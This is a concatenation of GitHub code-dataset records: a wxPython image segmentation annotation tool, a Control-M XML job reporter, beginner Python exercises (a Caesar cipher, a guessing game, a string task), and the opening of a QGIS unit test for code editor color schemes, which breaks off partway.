e.GetPosition()\r\n # print(\"current window position x = \", x, \" y= \", y)\r\n\r\n def OnKeyDown(self, e):\r\n # print(e.GetKeyCode())\r\n if e.GetKeyCode() == 32:\r\n # space -- save polygon\r\n self.drawPane.savePolygon()\r\n elif e.GetKeyCode() == 8:\r\n # backspace -- delete current vertex\r\n self.drawPane.deleteLastVertex()\r\n\r\n def OnButtonClicked(self, e):\r\n global polygons\r\n global polygons_to_be_deleted\r\n global current_polygon_to_be_deleted_idx\r\n global image_np_all_slices_segmentation\r\n global old_area_list\r\n global current_operation\r\n global operation_changed\r\n global FILE_PATH\r\n if e.Id == 76: # load left slice\r\n if self.current_slice > 0:\r\n # self.SaveCurrentSegmentation()\r\n self.current_slice -= 1\r\n self.m_slider1.Value = self.current_slice\r\n self.PrepAndChangeImage(self.current_slice)\r\n elif e.Id == 77: # load right slice\r\n if self.current_slice < self.num_slices_current_axis - 1:\r\n # self.SaveCurrentSegmentation()\r\n self.current_slice += 1\r\n self.m_slider1.Value = self.current_slice\r\n self.PrepAndChangeImage(self.current_slice)\r\n elif e.Id == 80: # proper erase?\r\n if current_operation == 'edit':\r\n oal = polygons_to_be_deleted[current_polygon_to_be_deleted_idx]\r\n polygons_new = []\r\n for elem in polygons:\r\n if elem[0] != oal[0]:\r\n polygons_new.append(elem)\r\n polygons_to_be_deleted = []\r\n current_polygon_to_be_deleted_idx = 0\r\n polygons = polygons_new.copy()\r\n self.drawPane.contourPoints = []\r\n image_np_all_slices_segmentation = np.zeros((IMAGE_HEIGHT, IMAGE_WIDTH, NUM_CLASSES), dtype=np.bool_)\r\n redrawSegmentationPolys(polygons)\r\n self.PrepAndChangeImage(plotAnnotationsOverlay())\r\n self.m_button3.Disable()\r\n self.m_button31b.Disable()\r\n self.m_button31p.Disable()\r\n self.m_button31n.Disable()\r\n self.m_choiceClass.Disable()\r\n self.m_button31c.Disable()\r\n else:\r\n # self.drawPane.clear()\r\n # self.EraseCurrentSegmentation()\r\n self.drawPane.contourPoints = []\r\n self.PrepAndChangeImage(plotAnnotationsOverlay())\r\n \"\"\"\r\n if self.m_button3.GetForegroundColour().RGB == 0:\r\n self.m_button3.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_HIGHLIGHT))\r\n else:\r\n self.m_button3.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT))\r\n \"\"\"\r\n elif e.Id == 81: # delete last vertex\r\n self.drawPane.deleteLastVertex()\r\n elif e.Id == 83: # save all\r\n self.SaveSegmentationToFile()\r\n elif e.Id == 84: # save polygon\r\n self.drawPane.savePolygon()\r\n # image_np_all_slices_segmentation = np.zeros_like(image_np_all_slices)\r\n elif e.Id == 85: # contour\r\n self.drawPane.setDrawingStyle('contour')\r\n self.m_button61.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_HIGHLIGHT))\r\n self.m_button611.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT))\r\n self.m_button6111.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT))\r\n\r\n elif e.Id == 86: # brush\r\n self.drawPane.setDrawingStyle('brush')\r\n self.m_button61.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT))\r\n self.m_button611.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_HIGHLIGHT))\r\n self.m_button6111.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT))\r\n\r\n elif e.Id == 89: # brush delete\r\n self.drawPane.setDrawingStyle('brushDelete')\r\n self.m_button61.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT))\r\n self.m_button611.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT))\r\n self.m_button6111.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_HIGHLIGHT))\r\n elif e.Id >= START_BUTTON_ID_CLASSES and e.Id <= START_BUTTON_ID_CLASSES + NUM_CLASSES:\r\n for idxx in range(START_BUTTON_ID_CLASSES, START_BUTTON_ID_CLASSES + NUM_CLASSES):\r\n self.buttons_classes[idxx - START_BUTTON_ID_CLASSES].SetForegroundColour(\r\n wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT))\r\n\r\n self.buttons_classes[idxx - START_BUTTON_ID_CLASSES].SetBackgroundColour(\r\n wx.Colour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOW)))\r\n self.drawPane.selected_class = e.Id - START_BUTTON_ID_CLASSES\r\n self.buttons_classes[e.Id - START_BUTTON_ID_CLASSES].SetBackgroundColour(\r\n wx.Colour(CLASS_COLORS_RGB[self.drawPane.selected_class][0],\r\n CLASS_COLORS_RGB[self.drawPane.selected_class][1],\r\n CLASS_COLORS_RGB[self.drawPane.selected_class][2],\r\n 125))\r\n self.buttons_classes[e.Id - START_BUTTON_ID_CLASSES].SetForegroundColour(\r\n wx.SystemSettings.GetColour(wx.SYS_COLOUR_HIGHLIGHT))\r\n elif e.Id == 202:\r\n if len(old_area_list) > 0:\r\n polygons_new = []\r\n for elem in polygons:\r\n if elem[0] != old_area_list[-1]:\r\n polygons_new.append(elem)\r\n old_area_list = old_area_list[:-1]\r\n polygons = polygons_new.copy()\r\n self.drawPane.contourPoints = []\r\n image_np_all_slices_segmentation = np.zeros((IMAGE_HEIGHT, IMAGE_WIDTH, NUM_CLASSES), dtype=np.bool_)\r\n redrawSegmentationPolys(polygons)\r\n self.PrepAndChangeImage(plotAnnotationsOverlay())\r\n elif e.Id == 203:\r\n if current_polygon_to_be_deleted_idx - 1 < 0:\r\n current_polygon_to_be_deleted_idx = len(polygons_to_be_deleted) - 1\r\n else:\r\n current_polygon_to_be_deleted_idx -= 1\r\n redrawSegmentationPolys(polygons_to_be_deleted, highlighted=current_polygon_to_be_deleted_idx)\r\n self.m_choiceClass.SetSelection(polygons_to_be_deleted[current_polygon_to_be_deleted_idx][1])\r\n print('pdbd idx', current_polygon_to_be_deleted_idx)\r\n self.PrepAndChangeImage(plotAnnotationsOverlay())\r\n elif e.Id == 204:\r\n if current_polygon_to_be_deleted_idx + 1 > len(polygons_to_be_deleted) - 1:\r\n current_polygon_to_be_deleted_idx = 0\r\n else:\r\n current_polygon_to_be_deleted_idx += 1\r\n redrawSegmentationPolys(polygons_to_be_deleted, highlighted=current_polygon_to_be_deleted_idx)\r\n self.m_choiceClass.SetSelection(polygons_to_be_deleted[current_polygon_to_be_deleted_idx][1])\r\n print('pdbd idx', current_polygon_to_be_deleted_idx)\r\n\r\n self.PrepAndChangeImage(plotAnnotationsOverlay())\r\n elif e.Id == 205:\r\n polygons_to_be_deleted = []\r\n self.m_button3.Disable()\r\n self.m_button31p.Disable()\r\n self.m_button31n.Disable()\r\n self.m_button31b.Disable()\r\n self.m_choiceClass.Disable()\r\n self.m_button31c.Disable()\r\n redrawSegmentationPolys(polygons)\r\n self.PrepAndChangeImage(plotAnnotationsOverlay())\r\n elif e.Id == 207:\r\n self.m_button3.Disable()\r\n self.m_button31p.Disable()\r\n self.m_button31n.Disable()\r\n self.m_button31b.Disable()\r\n self.m_choiceClass.Disable()\r\n self.m_button31c.Disable()\r\n oal = polygons_to_be_deleted[current_polygon_to_be_deleted_idx]\r\n polygons_new = []\r\n for elem in polygons:\r\n if elem[0] != oal[0]:\r\n polygons_new.append(elem)\r\n else:\r\n polygons_new.append([elem[0], self.m_choiceClass.GetSelection(), elem[2], elem[3]])\r\n polygons = polygons_new.copy()\r\n polygons_to_be_deleted = []\r\n self.drawPane.contourPoints = []\r\n image_np_all_slices_segmentation = np.zeros((IMAGE_HEIGHT, IMAGE_WIDTH, NUM_CLASSES), dtype=np.bool_)\r\n redrawSegmentationPolys(polygons)\r\n self.PrepAndChangeImage(plotAnnotationsOverlay())\r\n elif e.Id == 208: # prev\r\n file_dir = os.path.dirname(FILE_PATH)\r\n print(file_dir)\r\n file_list = sorted(os.listdir(file_dir))\r\n file_idx = file_list.index(os.path.basename(FILE_PATH))\r\n new_path = ''\r\n while file_idx > 0:\r\n file_idx -= 1\r\n if '.jpg' in file_list[file_idx]:\r\n new_path = file_list[file_idx]\r\n break\r\n if new_path != '':\r\n FILE_PATH = os.path.join(file_dir, new_path)\r\n self.Close()\r\n loadFile()\r\n operation_changed = True\r\n #redrawSegmentationPolys(polygons)\r\n self.PrepAndChangeImage(plotAnnotationsOverlay())\r\n current_polygon_to_be_deleted_idx = 0\r\n #current_operation = operations_list[self.rbox.GetSelection()]\r\n # self.__init__(self, \"segmentation\")\r\n # change file path\r\n\r\n #self.initOperation()\r\n # self.mainLogin.Hide()\r\n # self.Layout()\r\n # self.__init__(None, title=\"lala\")\r\n # self.Close()\r\n elif e.Id == 209: # next\r\n file_dir = os.path.dirname(FILE_PATH)\r\n print(file_dir)\r\n file_list = sorted(os.listdir(file_dir))\r\n file_idx = file_list.index(os.path.basename(FILE_PATH))\r\n new_path = ''\r\n while file_idx < len(file_list)-1:\r\n file_idx += 1\r\n if '.jpg' in file_list[file_idx]:\r\n new_path = file_list[file_idx]\r\n break\r\n if new_path != '':\r\n FILE_PATH = os.path.join(file_dir, new_path)\r\n self.Close()\r\n loadFile()\r\n operation_changed = True\r\n #redrawSegmentationPolys(polygons)\r\n self.PrepAndChangeImage(plotAnnotationsOverlay())\r\n current_polygon_to_be_deleted_idx = 0\r\n def OnScrollChanged(self, e):\r\n if e.Id == 78: # slice scroll\r\n # self.SaveCurrentSegmentation()\r\n self.current_slice = e.Position\r\n self.PrepAndChangeImage(self.current_slice)\r\n elif e.Id == 82: # contrast\r\n # self.SaveCurrentSegmentation()\r\n self.clahe = cv2.createCLAHE(clipLimit=e.Position, tileGridSize=(8, 8))\r\n self.PrepAndChangeImage(self.current_slice)\r\n\r\n def OnComboboxChanged(self, e):\r\n if e.Id == 79: # num_slice\r\n # self.SaveCurrentSegmentation()\r\n new_slice_index = e.Selection - 1\r\n self.current_slice = new_slice_index\r\n self.PrepAndChangeImage(self.current_slice)\r\n elif e.Id == 87: # brush size\r\n self.drawPane.brushSize = int(e.String)\r\n elif e.Id == 88: # view axis change\r\n if e.String != self.current_axis:\r\n self.current_axis = e.String\r\n self.current_slice = 0\r\n self.PrepAndChangeImage(self.current_slice)\r\n\r\n self.num_slices_current_axis = NUM_SLICES\r\n\r\n # reset slider + slice selector\r\n comboBox1Choices = list(map(str, range(1, self.num_slices_current_axis)))\r\n self.m_comboBox1.Items = comboBox1Choices\r\n\r\n self.m_slider1.Max = self.num_slices_current_axis\r\n\r\n def OnCheckBoxChanged(self, e):\r\n global HIDE_SEGMENTATION\r\n if e.Id == 210: # hide segmentation\r\n if self.checkBox2.GetValue() is True:\r\n HIDE_SEGMENTATION = True\r\n self.PrepAndChangeImage(plotAnnotationsOverlay())\r\n else:\r\n HIDE_SEGMENTATION = False\r\n self.PrepAndChangeImage(plotAnnotationsOverlay())\r\n\r\n\r\n def PrepAndChangeImage(self, slice):\r\n # print(image_np_all_slices_normed.shape)\r\n try:\r\n c_w, c_h, _ = slice.shape\r\n except:\r\n slice = image_np_all_slices_normed\r\n # np_prep_image = np.array(slice, dtype=np.uint8)\r\n np_prep_image = slice\r\n c_w, c_h, _ = np_prep_image.shape\r\n image = wx.Image(c_h, c_w)\r\n image.SetData(np_prep_image)\r\n self.drawPane.changeImage(image)\r\n\r\n def SaveCurrentSegmentation(self):\r\n current_segmentation = self.drawPane.getCurrentSegmentation()\r\n image_np_all_slices_segmentation[:, :, self.current_slice] = np.maximum(\r\n image_np_all_slices_segmentation[:, :, self.current_slice], current_segmentation[:, :, 0])\r\n self.drawPane.clear()\r\n\r\n def EraseCurrentSegmentation(self):\r\n image_np_all_slices_segmentation[:, :, self.current_slice] = 0\r\n\r\n self.drawPane.clear()\r\n\r\n def SaveSegmentationToFile(self):\r\n np.savez_compressed(\r\n os.path.join(SEG_PATH_OUT, 'seg_' + os.path.basename(FILE_PATH).replace('.' + IMAGE_EXTENSION, '.npz')),\r\n np.array(image_np_all_slices_segmentation > 0, dtype=np.bool_))\r\n with open(os.path.join(SEG_PATH_OUT,\r\n 'seg_' + os.path.basename(FILE_PATH).replace('.' + IMAGE_EXTENSION, '_polys.pkl')),\r\n 'wb') as fp:\r\n pickle.dump(polygons, fp)\r\n if not os.path.exists(os.path.join(SEG_PATH_OUT, 'segmentation_preview')):\r\n os.makedirs(os.path.join(SEG_PATH_OUT, 'segmentation_preview'))\r\n cv2.imwrite(os.path.join(SEG_PATH_OUT, 'segmentation_preview',\r\n 'seg_rgb_' + os.path.basename(FILE_PATH).replace('.' + IMAGE_EXTENSION, '.png')),\r\n plotAnnotationsOverlay()[:, :, ::-1])\r\n # current_annotations = plotAnnotations()\r\n # current_annotations = current_annotations[BORDER_PADDING:IMAGE_HEIGHT - BORDER_PADDING,\r\n # BORDER_PADDING:IMAGE_WIDTH - BORDER_PADDING, :]\r\n # current_annotations = cv2.cvtColor(current_annotations, cv2.COLOR_RGB2BGR)\r\n # cv2.imwrite(os.path.join(SEG_PATH_OUT, 'seg_' + os.path.basename(FILE_PATH)), current_annotations)\r\n\r\n def __del__(self):\r\n pass\r\n\r\n\r\n###########################################################################\r\n## Class display_frame\r\n###########################################################################\r\n\r\nclass display_frame(wx.Frame):\r\n def __init__(self, parent, title):\r\n self._current_slice = 0\r\n self.num_slices_current_axis = NUM_SLICES\r\n\r\n self.frame = wx.Frame.__init__(self, parent, id=wx.ID_ANY, title=title, pos=wx.DefaultPosition,\r\n size=wx.Size(1280, 768), style=wx.DEFAULT_FRAME_STYLE | wx.TAB_TRAVERSAL,\r\n name=u\"Seg\")\r\n\r\n self.SetSizeHints(wx.DefaultSize, wx.DefaultSize)\r\n\r\n bSizer1 = wx.BoxSizer(wx.VERTICAL)\r\n\r\n self.image = wx.Image(IMAGE_WIDTH, IMAGE_HEIGHT) # EmptyImage\r\n self.image.SetData(image_previous_segmentation_overlaid.tostring())\r\n\r\n self.bitmap = self.image.ConvertToBitmap()\r\n\r\n self.m_bitmap1 = wx.StaticBitmap(self, wx.ID_ANY, self.bitmap, wx.DefaultPosition, wx.DefaultSize, 0)\r\n bSizer1.Add(self.m_bitmap1, 1, wx.ALL | wx.EXPAND, 5)\r\n\r\n self.SetSizer(bSizer1)\r\n self.Layout()\r\n\r\n self.Centre(wx.BOTH)\r\n\r\n self.Bind(wx.EVT_SIZE, self.onResize)\r\n\r\n def redrawImage(self):\r\n self.dc = wx.ClientDC(self) # batman\r\n new_w, new_h = self.dc.GetSize()\r\n print(\"nwh\", new_w, new_h)\r\n if new_w != 0 and new_h != 0:\r\n self.bitmap = self.image.Scale(new_w, new_h).ConvertToBitmap()\r\n # self.dc.DrawBitmap(self.resized_bitmap, 0, 0)\r\n self.m_bitmap1.SetBitmap(self.bitmap)\r\n\r\n def onResize(self, e=None):\r\n W, H = self.m_bitmap1.Size\r\n if W > H:\r\n NewW = W\r\n NewH = W * H / W\r\n else:\r\n NewH = H\r\n NewW = H * W / H\r\n img = self.image\r\n img = img.Scale(NewW, NewH)\r\n self.m_bitmap1.SetBitmap(wx.Bitmap(img))\r\n e.Skip()\r\n self.Refresh()\r\n\r\n\r\ndef plotPreviousSegmentations(path):\r\n for current_image_path in os.listdir(path):\r\n if not 'jpg' in current_image_path or 'png' in current_image_path:\r\n continue\r\n if os.path.exists(os.path.join(path, 'segmentation_preview',\r\n 'seg_rgb_' + os.path.basename(current_image_path).replace('.' + IMAGE_EXTENSION,\r\n '.png'))):\r\n continue\r\n image_np_all_slices_normed_inside = []\r\n image_np_all_slices_segmentation_inside = []\r\n try:\r\n image_np_all_slices_normed_inside = cv2.imread(os.path.join(SEG_PATH_OUT, current_image_path))\r\n image_np_all_slices_segmentation_inside = np.load(\r\n os.path.join(path, 'seg_' + os.path.basename(current_image_path).replace('.jpg', '.npz')))[\r\n 'arr_0']\r\n image_np_all_slices_normed_inside = cv2.copyMakeBorder(image_np_all_slices_normed_inside, BORDER_PADDING, BORDER_PADDING, BORDER_PADDING, BORDER_PADDING, cv2.BORDER_CONSTANT)\r\n if not os.path.exists(os.path.join(path, 'segmentation_preview')):\r\n os.makedirs(os.path.join(path, 'segmentation_preview'))\r\n cv2.imwrite(os.path.join(path, 'segmentation_preview',\r\n 'seg_rgb_' + os.path.basename(current_image_path).replace('.' + IMAGE_EXTENSION,\r\n '.png')),\r\n plotAnnotationsOverlay2(image_np_all_slices_normed_inside, image_np_all_slices_segmentation_inside))\r\n except:\r\n pass\r\n\r\ndef loadFile():\r\n global image_previous_segmentation_overlaid\r\n global image_np_all_slices_segmentation\r\n global polygons\r\n global image_np_all_slices_normed\r\n global IMAGE_HEIGHT, IMAGE_WIDTH, NUM_SLICES\r\n global current_image\r\n global image_np_all_slices\r\n global PREV_FILE_PATH\r\n\r\n current_image = cv2.imread(FILE_PATH, 1)\r\n current_image = cv2.copyMakeBorder(current_image, BORDER_PADDING, BORDER_PADDING, BORDER_PADDING,\r\n BORDER_PADDING, cv2.BORDER_CONSTANT)\r\n current_image = cv2.cvtColor(current_image, cv2.COLOR_BGR2RGB)\r\n\r\n image_np_all_slices = current_image\r\n\r\n #if image_np_all_slices.shape[0] == 2300:\r\n # image_np_all_slices = cv2.resize(image_np_all_slices, None, fx=0.5, fy=0.5)\r\n\r\n IMAGE_HEIGHT, IMAGE_WIDTH, NUM_SLICES = image_np_all_slices.shape\r\n image_np_all_slices_normed = image_np_all_slices.copy()\r\n try:\r\n\r\n current_listdir = sorted(os.listdir(os.path.dirname(FILE_PATH)))\r\n\r\n current_basename = os.path.basename(FILE_PATH)\r\n\r\n current_idx = current_listdir.index(current_basename)\r\n\r\n putative_previous_basename = current_listdir[current_idx -1]\r\n\r\n if not (current_basename.split('_')[1] == putative_previous_basename.split('_')[1]):\r\n raise ValueError('No previous frames found.')\r\n\r\n\r\n image_previous_segmentation_overlaid = cv2.imread(os.path.join(SEG_PATH_OUT, 'segmentation_preview',\r\n 'seg_rgb_' + putative_previous_basename.replace('.' + IMAGE_EXTENSION,\r\n '.png')))\r\n image_previous_segmentation_overlaid = image_previous_segmentation_overlaid[:, :, ::-1]\r\n PREV_FILE_PATH = putative_previous_basename.split('.')[0]\r\n except:\r\n image_previous_segmentation_overlaid = []\r\n try:\r\n # current_image_seg = np.load(os.path.join(os.path.dirname(FILE_PATH), 'seg_'+os.path.basename(FILE_PATH).replace('.png', '.npz')))\r\n image_np_all_slices_segmentation = \\\r\n np.load(os.path.join(SEG_PATH_OUT,\r\n 'seg_' + os.path.basename(FILE_PATH).replace('.' + IMAGE_EXTENSION, '.npz')))[\r\n 'arr_0']\r\n #if image_np_all_slices_segmentation.shape[0] == 2300:\r\n # image_np_all_slices_segmentation = np.array(resize(image_np_all_slices_segmentation, (1150, 2118),preserve_range=True), dtype=np.bool_)\r\n with open(os.path.join(SEG_PATH_OUT,\r\n 'seg_' + os.path.basename(FILE_PATH).replace('.' + IMAGE_EXTENSION, '_polys.pkl')),\r\n 'rb') as fp:\r\n polygons_old = pickle.load(fp)\r\n #areas = []\r\n polygons = removePolygonDuplicates(polygons_old)\r\n #remove duplicates somehow\r\n #for p in polygons_old:\r\n # print(p[0])\r\n #current_area = int(p[0])\r\n # if current_area not in areas:\r\n # polygons.append(p)\r\n #areas.append(current_area)\r\n #areas = list(set(areas))\r\n # for p in polygons:\r\n # print(p[0])\r\n\r\n except:\r\n image_np_all_slices_segmentation = np.zeros((IMAGE_HEIGHT, IMAGE_WIDTH, NUM_CLASSES), dtype=np.bool_)\r\n polygons = []\r\n\r\n\r\nif __name__ == '__main__':\r\n app = wx.App(False)\r\n\r\n current_operation = 'segment' # selectOperation()\r\n image_path_list = []\r\n\r\n if current_operation == 'segment' or current_operation == 'edit':\r\n FILE_PATH = getSingleFilePath(\"*.png;*.jpg;*.jpeg;*.JPEG;*.PNG;\")\r\n elif current_operation == 'cancel':\r\n sys.exit(0)\r\n\r\n IMAGE_EXTENSION = os.path.basename(FILE_PATH).split('.')[-1]\r\n\r\n SEG_PATH_OUT = os.path.dirname(FILE_PATH)\r\n\r\n # plot previous segmentations\r\n previousSegemntationPlotThread = threading.Thread(target=plotPreviousSegmentations, args=[SEG_PATH_OUT])\r\n previousSegemntationPlotThread.start()\r\n\r\n loadFile()\r\n\r\n while operation_changed:\r\n print('new frame instance')\r\n top = seg_frame(None, title=os.path.basename(FILE_PATH).split('.')[0])\r\n print('instancing')\r\n try:\r\n if image_previous_segmentation_overlaid != []:\r\n print('bottom found')\r\n if PREV_FILE_PATH != '':\r\n bottom = display_frame(top, title=os.path.basename(PREV_FILE_PATH).split('.')[0])\r\n else:\r\n bottom = display_frame(top, title=_(\"Previous segmentation\"))\r\n bottom.SetPosition((0, 0))\r\n bottom.Show()\r\n except:\r\n pass\r\n top.Show()\r\n print('showing')\r\n app.MainLoop()\r\n print('end main loop')\r\n","repo_name":"onorabil/frameSegmentation","sub_path":"frameSeg.py","file_name":"frameSeg.py","file_ext":"py","file_size_in_byte":62766,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"28668921561","text":"import os\nimport sys\nimport time\nimport xml.etree.ElementTree as ET\n\n\ndef finder(schemaName, resourceName):\n numOfFoundJobs = 0\n schemaName = schemaName.lower()\n resourceName = resourceName.lower()\n path = '\\\\\\\\ntsrv1\\\\tohna\\\\Control-M_Project\\\\Full-Drafts-Prod'\n os.chdir(path)\n draftFiles = sorted(os.listdir(os.getcwd()), key=os.path.getmtime)\n lastDraftFile = draftFiles[-1]\n tree = ET.parse(lastDraftFile)\n root = tree.getroot()\n resultList = []\n for Table in root:\n tableName = str(Table.get('FOLDER_NAME'))\n orderMethod = str(Table.get('FOLDER_ORDER_METHOD'))\n for job in Table.iter('JOB'):\n tempList = []\n listRow = \"\\n**************************************\\n\\nTable : \" + tableName + \" - UserDaily : \" + orderMethod\n tempList.append(listRow)\n jobName = job.get('JOBNAME')\n nodeId = job.get('NODEID')\n applType = job.get('APPL_TYPE')\n if applType not in \"DATABASE\":\n continue\n if not nodeId:\n nodeId = \"None\"\n listRow = \"-->> Job : \" + jobName + \" - Agent : \" + nodeId\n tempList.append(listRow)\n loopObjectResult = []\n loopObjectResult = loopObject(job, schemaName, resourceName)\n if loopObjectResult != False and loopObjectResult != None:\n for loopListRow in loopObjectResult:\n tempList.append(loopListRow)\n numOfFoundJobs += 1\n resultList.append(tempList)\n for subList in resultList:\n print(\"\\n\".join(subList))\n print(\"\\n**************************************\\nTotal number of jobs found : \", numOfFoundJobs)\n\n\ndef getVariableType(i_VarName):\n dict = {\n \"%%FTP-LPATH1\": \"File Trans Left Path\",\n \"%%FTP-LPATH2\": \"File Trans Left Path\",\n \"%%FTP-LPATH3\": \"File Trans Left Path\",\n \"%%FTP-LPATH4\": \"File Trans Left Path\",\n \"%%FTP-LPATH5\": \"File Trans Left Path\",\n \"%%FTP-RPATH1\": \"File Trans Right Path\",\n \"%%FTP-RPATH2\": \"File Trans Right Path\",\n \"%%FTP-RPATH3\": \"File Trans Right Path\",\n \"%%FTP-RPATH4\": \"File Trans Right Path\",\n \"%%FTP-RPATH5\": \"File Trans Right Path\",\n \"%%FTP-RUSER\": \"File Trans Left User\",\n \"%%FTP-RUSER\": \"File Trans Right User\",\n \"%%FTP-ACCOUNT\": \"File Trans Account\",\n \"%%FTP-LHOST\": \"File Trans Left Host\",\n \"%%FTP-RHOST\": \"File Trans Right Host\",\n \"%%DB-STP_SCHEM\" : \"DB Schema\",\n \"%%DB-STP_PACKAGE\": \"DB PKG Name\",\n \"%%DB-STP_NAME\": \"DB SP Name\",\n \"%%INF-WORKFLOW\": \"INF WF Name\"\n }\n if i_VarName in dict:\n return dict[i_VarName]\n else:\n return i_VarName\n\n\ndef loopObject(objectName, schemaName, resourceName):\n tempList = []\n foundJobIndicator = False\n foundQrIndicator = False\n jobBasicAttribs = objectName.attrib\n for subItem in objectName:\n parameterType = subItem.tag\n lowerDict = dict((k.lower(), v.lower()) for k, v in subItem.attrib.items())\n if parameterType == \"VARIABLE\":\n varName = subItem.attrib.get('NAME')\n varValue = str(subItem.attrib.get('VALUE'))\n lowerVarValue = varValue.lower()\n if schemaName in lowerVarValue and varName in \"%%DB-STP_SCHEM\":\n foundJobIndicator = True\n translatedFieldName = getVariableType(varName)\n listRow = \"---->> \" + translatedFieldName + \" = \" + varValue\n tempList.append(listRow)\n qRList = []\n for qResource in objectName.iter('QUANTITATIVE'):\n qRName = str(qResource.get('NAME').lower())\n qRList.append(qRName)\n if resourceName in qRList:\n foundQrIndicator = True\n break\n else:\n listRow = \"---->> QR : \" + resourceName + \" Not Found\\n\" + \"-------->> QR List : \" + str(qRList)\n tempList.append(listRow)\n break\n else:\n continue\n else:\n continue\n if ((foundJobIndicator) and (foundQrIndicator == False)):\n return tempList\n else:\n return False\n\nyes = set(['YES', 'Y', 'YE'])\nschemaName = \"\"\nresourceName = \"\"\nkeepSearchingIndicator = True\nuseExcludeFlag = False\nwhile keepSearchingIndicator:\n schemaNames = \"\"\n while schemaNames == \"\":\n schemaNames = input('Enter the name of the Oracle Schemna : ')\n schemasList = schemaNames.split(',')\n resourceName = input('Enter Resource Name :')\n resourceName = resourceName.upper()\n for schema in schemasList:\n finder(schema, resourceName)\n keepSearching = input('do you want to search another string ? (y/yes)')\n keepSearching = keepSearching.upper()\n if keepSearching not in yes:\n keepSearchingIndicator = False\n\ninput('Press any key to continue.... ')\n\n\n\n\n","repo_name":"MikiManor/Python-ControlMUtils","sub_path":"Reporters/QRReporter-DB-Jobs.py","file_name":"QRReporter-DB-Jobs.py","file_ext":"py","file_size_in_byte":4985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"43563483841","text":"def main():\r\n caesarSubst()\r\n\r\ndef trimWhiteSpace(s):\r\n s = s.replace(\" \",\"\")\r\n return s\r\n\r\n\r\ndef caesarSubst():\r\n key = eval(input(\"Input an integer from 0 to 25: \"))\r\n s = trimWhiteSpace(input(\"What message do you want to encrypt?: \"))\r\n d = []\r\n e = []\r\n letters = (\"abcdefghijklmnopqrstuvwxyz\")\r\n for i in s:\r\n d.append(ord(i)+ key)\r\n for i in d:\r\n i =i + (i - 97)//26\r\n e.append(chr(i))\r\n print(\"\".join(e))\r\n\r\nmain()\r\n \r\n\r\n \r\n","repo_name":"gzsalam7/python-practice","sub_path":"salamTest4.py","file_name":"salamTest4.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"41144506777","text":"import random\r\n\r\nplay_game = 'y'\r\n\r\nwhile play_game == 'y':\r\n answer = random.randint(1, 100)\r\n try_number = input(\"Guess a number between 1 to 100 : \")\r\n try_number = int(try_number)\r\n counter = 1\r\n\r\n while try_number != answer:\r\n if try_number > answer:\r\n print(\"Your number is too large.\")\r\n elif try_number < answer:\r\n print(\"Your number is too small.\")\r\n try_number = int(input(\"Guess a number between 1 to 100 : \"))\r\n counter += 1\r\n print(f\"You got it. You tried {counter} times !!\")\r\n play_game = input(\"Continue ? Please enter y or n : \")\r\n\r\nprint(\"\\nThank you for playing with us !\")","repo_name":"Ketan-Kulkarni2791/Guessing-Random-Numbers","sub_path":"Updated_main.py","file_name":"Updated_main.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"4192391128","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 12 05:09:29 2022\r\n\r\n@author: Shohruh Tukhtashev\r\n\"\"\"\r\n\r\na=input('a=')\r\nsana=0\r\nfor i in range(len(a)):\r\n if a[i]==' ':\r\n sana+=1\r\nif sana!=1:\r\n for i in range(len(a)):\r\n if a[i]==' ':\r\n for j in range(i+1,len(a)):\r\n if a[j]!=' ':\r\n print(a[j],end='')\r\n else:\r\n break\r\n break","repo_name":"Shohruhtukhtashev/Problem-solving","sub_path":"String/string39.py","file_name":"string39.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30550482554","text":"\"\"\"QGIS Unit tests for QgsCodeEditorColorScheme\n\n.. note:: This program is free software; you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation; either version 2 of the License, or\n(at your option) any later version.\n\"\"\"\n__author__ = 'Nyall Dawson'\n__date__ = '03/10/2020'\n__copyright__ = 'Copyright 2020, The QGIS Project'\n\nfrom qgis.PyQt.QtCore import QCoreApplication\nfrom qgis.PyQt.QtGui import QColor\nfrom qgis.core import QgsSettings\nfrom qgis.gui import (\n QgsCodeEditorColorScheme,\n QgsCodeEditorColorSchemeRegistry,\n QgsGui,\n)\nimport unittest\nfrom qgis.testing import start_app, QgisTestCase\n\nstart_app()\n\n\nclass TestQgsCodeEditorColorScheme(QgisTestCase):\n\n @classmethod\n def setUpClass(cls):\n \"\"\"Run before all tests\"\"\"\n super().setUpClass()\n QCoreApplication.setOrganizationName(\"QGIS_Test\")\n QCoreApplication.setOrganizationDomain(\"QGIS_TestPyQgsCodeEditorColorScheme.com\")\n QCoreApplication.setApplicationName(\"QGIS_TestPyQgsCodeEditorColorScheme\")\n QgsSettings().clear()\n start_app()\n\n def testScheme(self):\n scheme = QgsCodeEditorColorScheme('my id', 'my name')\n self.assertEqual(scheme.id(), 'my id')\n self.assertEqual(scheme.name(), 'my name')\n\n scheme.setColor(QgsCodeEditorColorScheme.ColorRole.Keyword, 